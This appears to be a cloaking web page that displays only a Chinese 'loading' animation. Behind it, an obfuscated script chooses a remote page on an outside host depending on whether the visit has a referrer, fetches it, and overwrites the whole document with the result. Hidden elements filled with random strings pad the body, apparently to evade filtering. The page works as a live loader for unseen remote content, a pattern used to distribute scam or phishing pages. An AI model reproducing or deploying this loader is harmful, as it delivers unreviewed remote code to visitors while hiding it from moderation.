<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rcxgVCmgz9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rcxgVCmgz9 .YvwsvNW {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rcxgVCmgz9 .content {
            line-height: 50px;
            text-align: center
        }

        .rcxgVCmgz9 .img {
            width: 100%
        }

        .rcxgVCmgz9 .PLHDJ7 {
            text-align: center
        }

        .rcxgVCmgz9 .PLHDJ7 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rcxgVCmgz9 .PLHDJ7 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rcxgVCmgz9 .PLHDJ7 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rcxgVCmgz9 .PLHDJ7 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rcxgVCmgz9 .PLHDJ7 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rcxgVCmgz9 .PLHDJ7 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rcxgVCmgz9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function f5kpnAwVBixP5(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var zkmg7Ng = f5kpnAwVBixP5('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ zkmg7Ng +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ zkmg7Ng +".html?a=share";
		}
		
        YgGjmIv3hB=url+"#"+new Date().getTime();
        YgGjmIv3hB && function() {
            $.get(YgGjmIv3hB, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >t96s3fbv7NeipTtsgHMS7bUhUxf4gWWCY8Lk9</li>
<h1 style='display:none' >u6QYgsKVPvT6LFteSP5XxPzh9UFYfm0b5K</h1>
<span style='display:none'>d4i7X455Tu00Cns8MeblcP6lW2lMHfZAc4</span><div class="rcxgVCmgz9">
    <div class="YvwsvNW">
        <div class="PLHDJ7">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<div style='display:none'>RoUG8aeZtaHKOYgDChx9vVxnn2GzFKMzKlba6G4x5Iy53zFpWLDXTo5DELEhUI3PTdQPsUhF4HbisIeRsxDGyHMnhZZdDu</div>
<img  src='' style='display:none'>
<ul style='display:none' >e0OMaWehUf0u81kydUgSaogXAkrj38c1uXCoTQoVfSHWjTUfsi07kYOoygM5UdqztW9m4OrFTSzCved3ODF</ul>
<ul style='display:none' >e0OMaWehUf0u81kydUgSaogXAkrj38c1uXCoTQoVfSHWjTUfsi07kYOoygM5UdqztW9m4OrFTSzCved3ODF</ul>
<ul style='display:none' >e0OMaWehUf0u81kydUgSaogXAkrj38c1uXCoTQoVfSHWjTUfsi07kYOoygM5UdqztW9m4OrFTSzCved3ODF</ul>
<p  style='display:none'>crmGWXyvyNsSAWnyOqYTrfEf6K2zqQWrDYWx3wZOdkwfKL5RVhO6Vufxlf468NjV3rZZm</p></body>
</html>